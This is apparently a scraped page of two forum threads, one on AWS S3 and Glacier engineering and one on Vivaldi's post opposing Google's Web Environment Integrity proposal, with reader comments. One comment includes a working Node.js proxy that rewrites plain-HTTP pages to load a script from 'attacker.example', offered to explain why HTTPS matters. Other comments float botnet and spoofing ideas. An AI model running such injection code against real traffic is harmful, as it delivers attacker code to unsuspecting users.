Are there any public details on how Azure or GCP do archival storage?
Glacier is a big 'keep your lips sealed' one. I'd love AWS to talk about everything there, and the entire journey it was on because it is truly fascinating.
Amazon engineer here - can confirm that Glacier transcodes all data on to the backs of the shells of the turtles that hold up the universe. Infinite storage medium, if a bit slow.
Never officially stated, but frequent leaks from insiders confirm that Glacier is based on Very Large Arrays of Wax Phonograph Records (VLAWPR) technology.
It's honestly super impressive that it's never leaked. All it takes is one engineer getting drunk and spouting off. In much higher stakes, a soldier in Massachusetts is about to go to jail for a long time for leaking national security intel on Discord to look cool to his gamer buddies. I would have expected details on Glacier to come out by now.
Glacier was originally using actual glaciers as a storage medium since they have been around forever. But then climate change happened, so they quickly shifted to tiered storage of tape and hard drives.
Blu-ray discs are thought to be the key: https://storagemojo.com/2014/04/25/amazons-glacier-secret-bd...
Some people disagree though. It's still an unknown.
I don't expect highly paid engineers to leak it, but a random contractor at a datacenter or supplier would eventually leak it if they used a special storage device other than HDD/SSD. Since we don't see any leaks, I suspect that it's based on HDD, with a very long IO waitlist.
Just look at other clouds. I doubt amazon is doing anything special. At least they don't reflect any special pricing.
> That's a bit error rate of 1 in 10^15 requests. In the real world, we see that blade of grass get missed pretty frequently – and it's actually something we need to account for in S3.
One of the things I remember from my time at AWS was conversations about how 1 in a billion events end up being a daily occurrence when you're operating at S3 scale. Things that you'd normally mark off as so wildly improbable it's not worth worrying about, have to be considered, and handled.
Glad to read about ShardStore, and especially the formal verification, property based testing etc. The previous generation of services were notoriously buggy, a very good example of the usual perils of organic growth (but at least really well designed such that they'd fail 'safe', ensuring no data loss, something S3 engineers obsessed about).
Personally I'd love working in that kind of environment. That one in a billion hole still itches at me. There's also a slightly-perverse little voice in my head ready with popcorn in case I'm lucky enough to watch the ensuing fallout from the first major crypto hash collision :-).
Was an SDM of a team of brand new SDEs standing up a new service. In a code review, pointed to an issue that could cause a Sev2, and the SDE pushed back 'that's like one in a million chance, at most'. Pointed out once we were dialled up to 500k TPS (which is where we needed to be at), that was 30 times a minute... 'You want to be on call that week?'. Insist on Highest Standards takes on a different meaning in that stack compared to most orgs.
James Hamilton, AWS' chief architect, wrote about this phenomenon in 2017: At scale, rare events aren't rare; https://news.ycombinator.com/item?id=14038044
I think Ceph hit similar problems and they had to add more robust checksumming to the system, as relying on just TCP checksums for integrity, for example, was no longer enough.
> daily occurrence when you're operating at S3 scale
Yeah! With S3 averaging over 100M requests per second, 1 in a billion happens every ten seconds. And it's not just S3. For example, for Prime Day 2022, DynamoDB peaked at over 105M requests per second (just for the Amazon workload): https://aws.amazon.com/blogs/aws/amazon-prime-day-2022-aws-f...
In the post, Andy also talks about Lightweight Formal Methods and the team's adoption of Rust. When even extremely low probability events are common, we need to invest in multiple layers of tooling and process around correctness.
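Putting rough numbers on that (the request rates here are round, hypothetical figures, not internal ones):

# Quick arithmetic on why "one in a billion" stops being rare at scale.
EVENT_PROBABILITY = 1e-9     # a "never happens" event, per request

for requests_per_second in [1, 1_000, 100_000_000]:
    events_per_day = requests_per_second * 86_400 * EVENT_PROBABILITY
    print(f"{requests_per_second:>11,} req/s -> "
          f"{events_per_day:>10.5g} expected events per day")

# At 1 request per second you'd wait roughly 30 years between such events;
# at 100M requests per second one happens about every ten seconds,
# i.e. thousands of times a day.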
Also worked at Amazon, saw some issues with major well known open source libraries that broke in places nobody would ever expect.
To think that when Andy's Coho Data built their first prototype on top of my abandoned Lithium [1] code base from VMware, the first thing they did was remove "all the crazy checksumming code" to not slow things down...
Daily? A component I worked on that supported S3's Index could hit a 1 in a billion issue multiple times a minute. Thankfully we had good algorithms and hardware that is a lot more reliable these days!
What most people don't realize is that the magic isn't in handling the system itself; the magic is making authorization appear to be zero-cost.
In distributed systems authorization is incredibly difficult. At the scale of AWS it might as well be magic. AWS has a rich permissions model with changes to authorization bubbling through the infrastructure at sub-millisecond speed - while handling probably trillions of requests.
This and logging/accounting for billing are the two magic pieces of AWS that I'd love to see an article about.
Note that S3 does AA differently than other services, because the permissions are on the resource. I suspect that's for speed?
Keep in mind that S3 predates IAM by several years. So part of the reason that access to buckets/keys is special is because it was already in place by the time IAM came around.
It's likely persisted since then, largely because removing the old model would be a difficult task without potentially breaking a lot of customers' setups.
S3 is a truly amazing piece of technology. It offers peace of mind (well, almost), zero operations, and practically unlimited bandwidth, at least for analytics workloads. Indeed, it's so good that there has not been much progress in building an open-source alternative to S3. There seems to be not much activity in the Hadoop community. I have yet to hear of any company that uses RADOS on Ceph to handle PBs of data for analytics workloads. MinIO made its name recently, but its license is restrictive and its community is quite small compared to that of Hadoop in its heyday.
There was a time when S3 was getting resilient. Today it is excellent. Pepperidge Farm remembers.
> There seems not much activity in the Hadoop community
There is apache ozone https://ozone.apache.org/
754 points 6 days ago by dagurp in 2876th position
vivaldi.com | Estimated reading time – 7 minutes | comments | anchor
Google seems to love creating specifications that are terrible for the open web and it feels like they find a way to create a new one every few months. This time, we have come across some controversy caused by a new Web Environment Integrity spec that Google seems to be working on.
At this time, I could not find any official message from Google about this spec, so it is possible that it is just the work of some misguided engineer at the company that has no backing from higher up, but it seems to be work that has gone on for more than a year, and the resulting spec is so toxic to the open Web that at this point, Google needs to at least give some explanation as to how it could go so far.
The spec in question, which is described at https://github.com/RupertBenWiser/Web-Environment-Integrity/blob/main/explainer.md, is called Web Environment Integrity. The idea of it is as simple as it is dangerous. It would provide websites with an API telling them whether the browser, and the platform it is currently running on, are trusted by an authoritative third party (called an attester). The details are nebulous, but the goal seems to be to prevent "fake" interactions with websites of all kinds. While this seems like a noble motivation, and the use cases listed seem very reasonable, the solution proposed is absolutely terrible and has already been equated with DRM for websites, with all that it implies.
It is also interesting to note that the first use case listed is about ensuring that interactions with ads are genuine. While this is not problematic on the surface, it certainly hints at the idea that Google is willing to use any means of bolstering its advertising platform, regardless of the potential harm to the users of the web.
Despite the text mentioning the incredible risk of excluding vendors (read, other browsers), it only makes a lukewarm attempt at addressing the issue and ends up without any real solution.
Simply, if an entity has the power of deciding which browsers are trusted and which are not, there is no guarantee that they will trust any given browser. Any new browser would by default not be trusted until it has somehow demonstrated that it is trustworthy, at the discretion of the attesters. Also, anyone stuck running on legacy software where this spec is not supported would eventually be excluded from the web.
To make matters worse, the primary example given of an attester is Google Play on Android. This means Google decides which browser is trustworthy on its own platform. I do not see how they can be expected to be impartial.
On Windows, they would probably defer to Microsoft via the Windows Store, and on Mac, they would defer to Apple. So, we can expect that at least Edge and Safari are going to be trusted. Any other browser will be left to the good graces of those three companies.
Of course, you can note one glaring omission in the previous paragraph. What of Linux? Well, that is the big question. Will Linux be completely excluded from browsing the web? Or will Canonical become the decider by virtue of controlling the snaps package repositories? Who knows. But it's not looking good for Linux.
This alone would be bad enough, but it gets worse. The spec hints heavily that one aim is to ensure that real people are interacting with the website. It does not clarify in any way how it aims to do that, so we are left with some big questions about how it will achieve this.
Will behavioral data be used to see if the user behaves in a human-like fashion? Will this data be presented to the attesters? Will accessibility tools that rely on automating input to the browser cause it to become untrusted? Will it affect extensions? The spec does currently specify a carveout for browser modifications and extensions, but those can make automating interactions with a website trivial. So, either the spec is useless or restrictions will eventually be applied there too. It would otherwise be trivial for an attacker to bypass the whole thing.
Unfortunately, it's not that simple this time. Any browser choosing not to implement this would not be trusted and any website choosing to use this API could therefore reject users from those browsers. Google also has ways to drive adoption by websites themselves.
First, they can easily make all their properties depend on using these features, and not being able to use Google websites is a death sentence for most browsers already.
Furthermore, they could try to mandate that sites that use Google Ads use this API as well, which makes sense since the first goal is to prevent fake ad clicks. That would quickly ensure that any browser not supporting the API would be doomed.
There is an overwhelming likelihood that EU law will not allow a few companies to have a huge amount of power in deciding which browsers are allowed and which are not. There is no doubt that attesters would be under a huge amount of pressure to be as fair as possible.
Unfortunately, legislative and judicial machineries tend to be slow and there is no saying how much damage will be done while governments and judges are examining this. If this is allowed to move forward, it will be a hard time for the open web and might affect smaller vendors significantly.
It has been long known that Google's dominance of the web browser market gives them the potential to become an existential threat to the web. With every bad idea they have brought to the table, like FLoC, Topics, and Client Hints, they have come closer to realizing that potential.
Web Environment Integrity is more of the same but also a step above the rest in the threat it represents, especially since it could be used to encourage Microsoft and Apple to cooperate with Google to restrict competition both in the browser space and the operating system space. It is imperative that they be called out on this and prevented from moving forward.
While our vigilance allows us to notice and push back against all these attempts to undermine the web, the only long-term solution is to get Google to be on an even playing field. Legislation helps there, but so does reducing their market share.
Similarly, our voice grows in strength for every Vivaldi user, allowing us to be more effective in these discussions. We hope that users of the web realize this and choose their browsers accordingly.
The fight for the web to remain open is going to be a long one and there is much at stake. Let us fight together.
Why use quotes for 'dangerous' when the first sentence is literally: 'Why Vivaldi browser thinks Google's new proposal, the Web-Environment-Integrity spec, is a major threat to the open web and should be pushed back.'
As usual, a thousand word essay on Google's WEI without ever mentioning that Apple sailed that ship silently a while ago, therefore not attracting any attention or backlash.
https://httptoolkit.com/blog/apple-private-access-tokens-att...
https://toot.cafe/@pimterry/110775130465014555
The sorry state of tech news / blogs. Regurgitating the same drama without ever looking at the greater picture.
I didn't notice it because I, just like a majority of internet users worldwide, do not own any Apple products and therefore I was never affected and probably never will be.
I do, however, routinely interact with websites that implement Google Analytics and/or Google ads. If those sites start rejecting my browser of choice I will most certainly be locked out of a significant portion of the internet. And the remaining 60% of all internet users would be essentially forced to accept this technology or else. That's an order of magnitude or two more users, and seems to me like a good reason to raise the alarm.
> As usual, a thousand word essay on Google's WEI without ever mentioning that Apple sailed that ship silently
The 'look! there's a bigger asshole over there' defense.
Never a winning strategy.
Personally I don't think PATs are nearly as bad as WEI. PATs just bypass CAPTCHAs while WEI will presumably lock people out of sites completely.
The post states it. This is not a problem because Safari is not the leading web browser. Apple has very limited power over what they can do with it.
Very controversial take but I think this benefits the vast majority of users by allowing them to bypass captchas. I'm assuming that people would use this API to avoid showing real users captchas, not completely prevent them from browsing the web.
Unfortunately people who have rooted phones, who use nonstandard browsers are not more than 1% of users. It's important that they exist, but the web is a massive platform. We can not let a tyranny of 1% of users steer the ship. The vast majority of users would benefit from this, if it really works.
However, I could see this tool being abused by certain websites to prevent users from logging in if they're on a non-standard browser, especially banks. Unfortunate, but overall beneficial to the masses.
Edit: Apparently 5% of the time it intentionally omits the result so it can't be used to block clients. Very reasonable solution.
There are obvious benefits here. The ability to remove captchas is one, the ability to ensure that clients are running the latest updates before accessing sensitive content, etc.
But the power is too significant. If it were some small subset of positive assertions I'd be ok with this, but the ability to perform arbitrary attestation is beyond what is required and is far too abusable.
> I think this benefits the vast majority of users by allowing them to bypass captchas.
I don't think it does that. Nothing about this reduces the problem that captchas are attempting to solve.
> i could see that this tool would be abused by certain websites and prevent users from logging in if on a non standard browser, especially banks.
That's not abusing this tool. That's the very thing that this is intended to allow.
how often do normal users see CAPTCHAs these days? I seldom see one anymore.
Most captchas these days are already only there to enforce Google's monopoly. If you use an 'approved' browser and let them track you, you don't get one; browse anonymously and you can't get past. That ship has already sailed and it's already evil, anticompetitive behavior.
> Unfortunately people who have rooted phones, who use nonstandard browsers are not more than 1% of users
Depends on what you count as 'nonstandard', but various estimates put non-top 6 browser usage at between 3-12% (https://en.wikipedia.org/wiki/Usage_share_of_web_browsers#Su...) and non-Windows/macOS/iOS/Android usage at ~4% (https://en.wikipedia.org/wiki/Usage_share_of_operating_syste....) These also don't take into account traffic on older operating systems or hardware that would be incompatible with these attestations, or clients that spoof their user agent for anonymity.
In an ideal world, we would see this number grow, not shrink. It's not good for consumers if our choices dwindle to just one or two options.
> We can not let a tyranny of 1% of users steer the ship.
Far less than 1% of my users use the accessibility features. In fact, it is closer to 1% of 1%. Does that justify the far, far easier development and bug testing that I would enjoy if I were to stop providing accessibility features?
> We can not let a tyranny of 1% of users steer the ship.
Normally I'd agree with you on that the tyranny of the minority is a bad thing, but sometimes the minority actually has a point and this is one of the cases where the minority is _objectively_ correct and letting the majority decide would end up in a complete dystopia. Democracy only works if everyone is informed (and able to think logically/critically, not influenced (either by force or by salary), etc.) and in this case the 99% simply do not have any clue on the effects of this being implemented (nor do they care). This entire proposal is pure orwellian shit.
WEI acts as proof that 'this is a browser', not 'this is a human'. But browsers can be automated with tools like Selenium. I'd guess that with the advent of complicated, JS-based captchas, browsers under automation are already the major battleground between serious scrapers and anti-bot tools.
I also don't understand how WEI does much to prevent a motivated user from faking requests. If you have Chrome running on your machine it's not gonna be too hard to extract a signed WEI token from its execution, one way or another, and pass that along with your Python script.
It looks like it basically gives Google another tool to constrain users' choices.
That is not controversial at all, but rather a plain fact about the short term incentives! If adoption of this technology weren't an attractor, then we'd have nothing to worry about. But the problem is the functionality of this spec, supported by the fundamental backdoor of corporate TPMs, is set up to facilitate power dynamics that inevitably result in full corporate control over everyone's computing environment.
I think these are the related threads to date—have I missed any?
Google is already pushing WEI into Chromium - https://news.ycombinator.com/item?id=36876301 - July 2023 (705 comments)
Google engineers want to make ad-blocking (near) impossible - https://news.ycombinator.com/item?id=36875226 - July 2023 (439 comments)
Google vs. the Open Web - https://news.ycombinator.com/item?id=36875164 - July 2023 (161 comments)
Apple already shipped attestation on the web, and we barely noticed - https://news.ycombinator.com/item?id=36862494 - July 2023 (413 comments)
Google's nightmare "Web Integrity API" wants a DRM gatekeeper for the web - https://news.ycombinator.com/item?id=36854114 - July 2023 (447 comments)
Web Environment Integrity API Proposal - https://news.ycombinator.com/item?id=36817305 - July 2023 (437 comments)
Web Environment Integrity Explainer - https://news.ycombinator.com/item?id=36785516 - July 2023 (44 comments)
Google Chrome Proposal – Web Environment Integrity - https://news.ycombinator.com/item?id=36778999 - July 2023 (93 comments)
Web Environment Integrity – Google locking down on browsers - https://news.ycombinator.com/item?id=35864471 - May 2023 (1 comment)
Add one more related:
Apple already shipped attestation on the web, and we barely noticed https://news.ycombinator.com/item?id=36862494
I had one but it got flagged, ah well:
- "I don't know why this enrages folks so much." Googler re Chrome anti-feature https://news.ycombinator.com/item?id=36868888
I think that just meant some users with sufficient karma flagged it, but I was a bit confused because for a while it didn't say '[flagged]' but didn't show up in the first several pages or continue to get upvotes. Is there a delay in saying '[flagged]'?
What's unclear to me is how the actual verification by this attester would happen. Somehow the attester, which is also a remote service, verifies your device? Are there any details on how that would happen specifically?
Basically, you build up a set of cryptographically verified computing primitives (like a secure enclave) that are enforced by a hardware component with keys baked in by the manufacturer. It's setting up an 'owned by vendor' computing channel and baking it into the silicon.
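As a rough, illustrative sketch of what that chain of trust amounts to (the names, certificate layout, and signature scheme here are assumptions, not anything the proposal specifies), the verification boils down to checking signatures up to a manufacturer root:

const crypto = require('crypto');

// Hypothetical verifier: a device key signs the attestation payload, and the
// device key's certificate chains back to a key baked in by the manufacturer.
function verifyAttestation(payload, signature, deviceCertPem, vendorRootPem) {
  const deviceCert = new crypto.X509Certificate(deviceCertPem);
  const vendorRoot = new crypto.X509Certificate(vendorRootPem);

  // 1. Was the device certificate issued (signed) by the vendor root?
  if (!deviceCert.verify(vendorRoot.publicKey)) return false;

  // 2. Was the payload signed by that device key?
  return crypto.verify('sha256', Buffer.from(payload), deviceCert.publicKey, signature);
}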
You won't get the chance to refuse this feature. There'll be too much money at stake for manufacturers to not retool for it. It'll be the only thing they make to sell, so take it or leave it chump.
> Any browser choosing not to implement this would not be trusted and any website choosing to use this API could therefore reject users from those browsers.
If we are serious about protesting this, let's do as follows: We implement code in our websites that checks whether the user agent implements this API. If the check passes, we tell the user that their browser is not welcome and why that is.
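As a hedged sketch (the API surface is not final; the explainer proposes a navigator.getEnvironmentIntegrity() entry point, but the name and shape could change), such a check might look like:

<script>
  // Hypothetical feature detection for the proposed WEI entry point.
  if ('getEnvironmentIntegrity' in navigator) {
    const note = document.createElement('p');
    note.textContent = 'Your browser implements Web Environment Integrity. ' +
      'This site opposes remote attestation on the open web - ' +
      'consider a browser that does not ship it.';
    document.body.prepend(note);
  }
</script>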
#BoycottGoogle #BoycottChrome #BoycottBullshit
> let's do as follows: We implement code in our websites that checks whether the user agent implements this API. If the check passes, we tell the user that their browser is not welcome and why that is.
I am sympathetic, I agree let's all do that....
...I cannot imagine any of the money people I work with agreeing
Tell that to your boss.
Also if google wants to, I'm sure they can obscure it
Would it be possible for someone using a zero-day vulnerability to develop a botnet that infects enough computers on the web, with a payload that modifies browsers in a way that renders them untrusted by WEI, effectively locking anybody infected out of the web? Would it be a new way to DDoS users out of the 'trusted' web?
I asked a similar question:
Can someone send attestation requests from a range of residential IPs with such frequency that the attestation sequence is forced to captcha users, thus defeating it? You don't need the token response back from an attestation, so you could spoof your IP and not worry about getting a response.
[flagged]
>It will actually be very positive for the web overall and you'll see the benefits soon enough.
What might those benefits be? Not being snarky here, but AFAICT the only folks who gain any benefit seem to be Google and their customers (advertisers).
What am I missing here?
As noted in the article, Google comes up with a scheme like this every couple months. They also can't seem to identify good sites anymore, based on their search results.
So... fuck it. Let them DRM their part of the internet. It is mostly shit nowadays anyway. They can index Reddit, X, and a bunch of sites that are GPT SEO trash.
We're never getting the 201X internet back anyway, so let Google and friends do their thing, and everybody who doesn't want anything to do with it can go back to the 200X internet. It was kind of disorganized, but it is better than fighting them on DRM over and over again.
We now need two things. First, an antitrust breakup of Google, separating search and ads. Second, a tax on ads.
It must be made against the economic interests of search engines to show too many ads.
I agree with the first. The second I think is missing the target. This really doesn't have anything to do with search. Instead this is Google (the largest ad seller) using its market position (as the maker of Chrome/Chromium, the most popular browser) to prevent users from not seeing its ads on any website where they're displayed.
While I believe that the idea of splitting Search and Ads could be a game changer, how would Search become profitable without Ads, and without compromising the rank algorithm?
It's never going to be against the economic interest of search engines to show ads, they can sell spots on their front page which are always going to be valuable.
This should be against their tactical interests, because it hurts their accuracy driving away users, but absent a significantly more accurate competitor they'll get away with it for a long time.
Regarding Google search there are some hopeful signs. For one, some people report Google's accuracy dropping; also, Google keeps switching up its idiosyncrasies to avoid spam, but in doing so they devalue the effort people put into SEO and into refining their Google-fu. These might be the same thing, however.
Could this be the end of my Youtube addiction arc?
Well, it's making me finally kick my Chrome habit. My work machine runs Firefox and it's fine, but my personal stuff is all on Chrome because it's also my password management, etc. etc.
I tried once before, when I quit working at Google and was trying to de-Google a bunch, and I never succeeded.
I plan to move everything over over the next few days. Wish me luck!
Next up: getting my photos out of Google Photos.
Well... I stopped watching Twitch after ublock stop blocking its ads, so maybe...
This is especially rich coming from Google, whose 'SafetyNet' for Android results in a significant reduction in security (contrary to its stated purpose): it locks out third-party up-to-date and secure ROMs while allowing horrifically insecure manufacturer-provided ROMs to still pass, because disabling those would cause a massive user outcry. So it functions as vendor lock-in with no meaningful increase in security for the average user, while preventing more advanced users from improving their security without buying more hardware. This needs to be called out more to push back against the claim that this kind of attestation somehow has a legitimate benefit for the users.
'The term cognitive distortions has often been used as a general umbrella term to refer to pseudo-justifications and rationalizations for their deviant behavior, and pro-criminal or offense-supporting attitudes (Maruna & Copes, 2004; Maruna & Mann, 2006; Ciardha & Gannon, 2011).' Helmond et al., Criminal Justice and Behavior, 2015, Vol. 42, No. 3, March 2015, 245-262
It seems that almost any software/website can be framed as having a legitimate benefit for users, e.g., increased convenience and/or security.^1 The more pertinent inquiry is what benefit(s) does it have for its author(s). What does it do (as opposed to 'what is it'). Let the user draw their own conclusions from the facts.
1. Arguably it could be a distortion to claim these are not mutually exclusive.
We can use web clients that do not leak excessive data that might be collected and used for advertising and tracking by so-called 'tech' companies. Google would prefer that we not use such clients. But why not. A so-called 'tech' company might frame all non-approved web clients as 'bots' and all web usage without disclosing excessive data about the computer user's setup^2 as relating to 'fraud'. It might frame all web usage as commercial in nature and thus all websites as receptacles for advertising. This 'all or nothing' thinking is a classic cognitive distortion.
2. This was the norm in the early days of the web.
And speaking of user-hostile, locked-down phones...
It is a galactic irony that Ben Wiser, the Googler who posted this proposal, has a blog where his most recent post is a rant about how he's being unfairly restricted and can't freely run the software he wants on his own device.
https://benwiser.com/blog/I-just-spent-%C2%A3700-to-have-my-...
> This is especially rich coming from Google, whose 'SafetyNet' for Android results in a significant reduction in security (contrary to its stated purpose): it locks out third-party up-to-date and secure ROMs while allowing horrifically insecure manufacturer-provided ROMs to still pass, because disabling those would cause a massive user outcry.
That's not the case with GrapheneOS:
https://grapheneos.org/articles/attestation-compatibility-gu...
SafetyNet is deprecated anyway:
https://developer.android.com/training/safetynet/deprecation...
You're using it wrong. SafetyNet is able to assert that the build the device reports is the build it is actually running. After you know that, it's up to you to decide whether you trust communications from that build or not. If it's a known-insecure build, you can say that you don't. SafetyNet cannot assert that a third-party ROM is what it claims to be, so you have to decide whether to trust communications from that device without knowing what build is on it at all.
Exactly! Ironically it's a possible reduction in security on custom roms as well if one chooses to bypass it, which is trivial, but requires rooting the device.
This kinda seems like a fantastic way to implement micropayments. The site owner sets up an attestor that knows the user has paid.
I hate WEI in general, but it really could open up control over bots and paid access.
Are you aware of any websites that have tried to implement payments, but failed or chose not to because they couldn't verify which users have paid? It's an incredibly easy problem to solve without WEI.
There is no reason that can't be done with existing web technology, WEI does not advance that use case in any meaningful way.
The Internet in general, programmers especially, and the Web community especially especially owe Google a massive debt of gratitude for all they've done over the years.
But this one's simple: "literally go fuck yourself with this. we will fight you tooth and fucking nail every fucking angstrom on this one. it's a bridge too far.".
Why are we in debt to them? Google has become stinking rich from everything that they've done. That's payment enough.
There is zero point debating this in technical detail because the proposal itself is evil. Don't get distracted by tone policing and how they scream you must be civil and whatnot.
Our best hope is kicking up a huge fuss so legislators and media will notice, so Google will be under pressure. It won't make them cancel the feature, but remember that they aren't above antitrust law. There is a significant chance that some competition authority will step in if the issue doesn't die down. Our job is to make sure it won't be forgotten really quickly.
> It won't make them cancel the feature, but remember that they aren't above antitrust law.
They can buy governments many times over with their vast resources, so it may be too late for that. What ideally should happen is that corporations this big are split until each of the new entities meets the definition of an SME. That's what is broken in the current iteration of capitalism. There is no real competition any more, so it no longer works.
I can see it being useful to have a feature which could validate whether another user on a website is a human. E.g., on Reddit or Twitter, the user you're talking to gets a little checkmark (not the blue checkmark) next to their name if they've been WEI validated. Rather than refusing to let a user use the platform, just let other users know that the person you're talking to isn't a bot.
Yes, we need to protest. And I don't mean protest by slamming Google's github repositories with comments. That's not a protest. Go tell the media. Go tell your elected officials.
I also think web developers getting together like we did with SOPA/PIPA and raising awareness on our web properties can also help. How do we organize that?
'This website is not compatible with your device'
I can see this show up on Youtube (why not - under Google's control, and they want you to watch the ads on their official browser) and on banking apps. Initially. In the longer run, it either withers and dies, or it leads to antitrust action. I really can't see another way.
Actually, absent a full chain-of-trust from boot, which I believe Android/iOS do provide, and possibly the proprietary desktop environments can provide, it should be possible to fake the 'I'm a legitimate browser' exchange. Which is what the 1% that care will do. But it sucks to have to go to deep underground 'crack' type stuff where before there was an open web. Not to mention the risk of getting hit by the banhammer if detected.
This will probably be implemented by every streaming service very quickly to try to prevent piracy (which won't work), and will only end up harming people who just want to watch on more freedom-respecting browsers or operating systems
Banks are not the target of this. If Banks do something that inhibits people with disabilities, corporate account managers with disabilities, or senior citizens, they will get skewered. They will tread carefully.
I'm curious to hear from someone familiar with web development: How much do websites invest in accessibility and related features that cater to a small audience? Can we draw any conclusions from this to how websites will deal with accessibility to non attested users?
Depends on the company size, really.
Large companies will invest significant resources with us to achieve AAA compliance with WCAG 2.1
Smaller companies will spend SOME additional budget to achieve AA.
Tiny companies will spend nothing until they get a demand letter.
I agree that extending trusted platform trust all the way up into web APIs is gross — it would be fine if the TPA club was wide open to anyone building their own OS, but that clearly will never happen and only the corporate-aligned cabal will ever be trusted, and all the free/open OSs will never be allowed to join.
But... is there scope for the attestor in WEI to be a third party site that does a super fancy "click on all the stop lights / stairs / boats" captcha, and then repurposes that captcha result for every other site? That doesn't sound like an awful service to add to the web. It would mean each individual site no longer had to do their own captcha.
(Probably impossible without third party cookies. But then that kind of implies that if WEI does make it possible then it could be shown to provide a tracking service equivalent to third party cookies? Again, gross.)
I agree, I think a third-party attestation service makes a lot of sense. Similar to how HTTPS has trusted CAs, there could be different trusted attestors that can verify that a user has some account with some kind of verification, and these pluggable attestors could then be trusted by sites. You'd still need to integrate with a trusted authenticator, which some people might find objectionable, but it's probably better than the current proposal in that regard.
This of course only covers half of the use cases discussed (the half about preventing bots, not to say anything about the more DRM-ey aspects).
It didn't scare me at all. As Google moves away from the open web, the open web also moves away from them.
A concern is that websites vital to people's lives, such as banks and government services, will adopt this to mimic the control they have on mobile platforms. With few brick-and-mortar branches remaining, it leaves few options open.
Why does everything need to be secure now?
I can understand shopping. And reporters of hot news. But why everything?
Why does my http site, which has nothing important on it at all, get flagged by chrome as 'insecure'?
This strikes me as a bunch of bs.
>Why does everything need to be secure now?
>I can understand shopping. And reporters of hot news. But why everything?
So Google can capture more ad revenue by refusing to 'attest' clients who run ad blockers?
And so other attestors can dictate the 'approved' software that can be used.
What could go wrong? /s
The usual argument is that vanilla HTTP makes it possible for a man-in-the-middle (your ISP, presumably?) to tamper with data payloads before they're delivered.
Requiring HTTPS means you require clients to have up-to-date TLS certificates and implementations. This provides a ratchet that slowly makes it harder and harder to use old computers and old software to access the web. Forced obsolescence and churn is highly desirable for anybody who controls the new standards, including Google.
> Why does my http site, which has nothing important on it at all, get flagged by chrome as 'insecure'?
Because an attacker can inject JavaScript code on it, and use it to attack other sites. The most famous example of that is 'Great Cannon', which used a MITM attack on http sites to inject JavaScript code which did a distributed denial of service attack on GitHub. Other possibilities include injecting code which uses a browser vulnerability to install malware on the computer of whoever accesses your site (a 'watering hole' attack), without having to invade your site first.
It's insecure because someone on path (or actually off-path but harder) could replace the contents of your website with whatever they want, including taking payments 'on your behalf' and then just pocketing them. The main original point of HTTPS, and why I assume it does not use starttls or similar, is so people in the late 1990s and early 2000s could figure out what websites they were allowed to put their credit card numbers into.
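To make 'replace the contents' concrete, here is a deliberately minimal, illustrative Node sketch of what an on-path box (ISP, hotspot, compromised router) could do to plain-HTTP traffic; every name here is made up for the example, and compression is ignored for simplicity:

const http = require('http');

// A tampering proxy: fetch the real page over plain HTTP, then inject an
// attacker-controlled script before returning it to the victim.
http.createServer((clientReq, clientRes) => {
  const headers = { ...clientReq.headers };
  delete headers['accept-encoding']; // keep the upstream response uncompressed

  const upstream = http.request(
    { host: clientReq.headers.host, path: clientReq.url, method: clientReq.method, headers },
    (upstreamRes) => {
      let body = '';
      upstreamRes.on('data', (chunk) => { body += chunk; });
      upstreamRes.on('end', () => {
        const tampered = body.replace(
          '</body>',
          '<script src="http://attacker.example/payload.js"></script></body>'
        );
        clientRes.writeHead(upstreamRes.statusCode, {
          'content-type': upstreamRes.headers['content-type'] || 'text/html'
        });
        clientRes.end(tampered);
      });
    }
  );
  clientReq.pipe(upstream);
}).listen(8080);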
> Can we just refuse to implement it?
> Unfortunately, it's not that simple this time. Any browser choosing not to implement this would not be trusted and any website choosing to use this API could therefore reject users from those browsers. Google also has ways to drive adoptions by websites themselves.
This is true of any contentious browser feature. Choosing not to implement it means your users will sometimes be presented with a worse UX if a website's developers decide to require that feature. But as a software creator, it's up to you to determine what is best for your customers. If your only hope of not going along with this is having the EU come in and slapping Google's wrist, I'm concerned that you aren't willing to take a hard stance on your own.
Google can just down-rank sites that don't implement this API. Voila, full adoption across the entire web and unapproved browsers are shut out.
> This is true of any contentious browser feature.
Makes me recall Flash.
Once was a time when very large parts of the web were dark to me because I would not install Flash
Not an exact comparison, but we've been (near) here beforehand
Well hold on. The problem with attestation is you're damned if you do and damned if you don't.
If you use a browser which supports attestation you will be denied service by companies who disapprove of what you run on your computer.
If you don't use a browser which supports attestation you will be denied service by companies who disapprove of what you run on your computer.
So everyone loses. If this goes live everyone in the world loses.
It is an utterly heinous proposal. It is perhaps the worst thing Google has ever produced. I use Firefox and will never use any browser that implements attestation, even if I have to stop using most of the WWW one day.
But unfortunately individual action is not going to be enough here, because no matter what you do, you lose.
This change is about what's best for advertisers and publishers, not customers.
This point in the blog post saddens me. Chrome's market share is huge, but Chrome is not ubiquitous. There was public outcry when Google was suspected of making youtube have 'bugs' on non-Chromium browsers - having them just straight up disable services for more than a third of users would result in an actual shitstorm, more than any of us could hope to drum up with an explanation of why this change is bad.
It would also drive the point home to the very same legislators that the author is deferring to.
If browsers now start pre-emptively folding, Google just straight up won. It's great that the Vivaldi team is against this change, but a blog post and hoping for regulation just won't cut it. You have actual leverage here, use it.
> If your only hope of not going along with this is having the EU come in and slapping Google's wrist, I'm concerned that you aren't willing to take a hard stance on your own.
I take umbrage at this implication. When a monopoly like Google takes anti-competitive actions, it's not fair or just to expect individuals to stand up to it. Governments exist to counter anti-competitive behavior like this, and governments have been doing a terrible job chopping down companies with too much vertical integration lately.
Since Google also controls the most popular search engine and ad network, they can exert very significant pressure on web developers by refusing to place ads or drive traffic to websites that don't comply.
I already block all ads so I'm obviously not totally sympathetic to developers who make decisions based on what will maximize ad revenue, but it still is not fair to put the burden on developers here and say 'it's your choice, just say no'.
Can't they just return a random number for attestation each time?
Google has been beaten down before when trying to do these kinds of things. Two that I can think of:
1) FLoC: https://www.theverge.com/2022/1/25/22900567/google-floc-aban...
2) Dart: Google wanted this to replace javascript, but Mozilla and MS both said no way, as they had no part in it. So that project ended up dying.
Google tries lots of things. Mozilla, MS, and Apple are still strong enough (especially outside the US) to push back on things that they think are a bad idea.
> Choosing not to implement it means your users will sometimes be presented with a worse UX if a website's developers decide to require that feature.
I think this makes a category error. Most browser features/APIs are indeed treated as progressive enhancements by web developers, at least until an overwhelming number of the users have access to that feature. And even then, even if the developer makes assumptions that the feature/API is present, often the result is a degraded experience rather than an all-out broken experience.
The same is not true of web attestation. If a website requires it and a browser refuses to implement it, in at least some cases (probably a concerningly high number of cases though) the result will be that the user is entirely locked out of using that website.
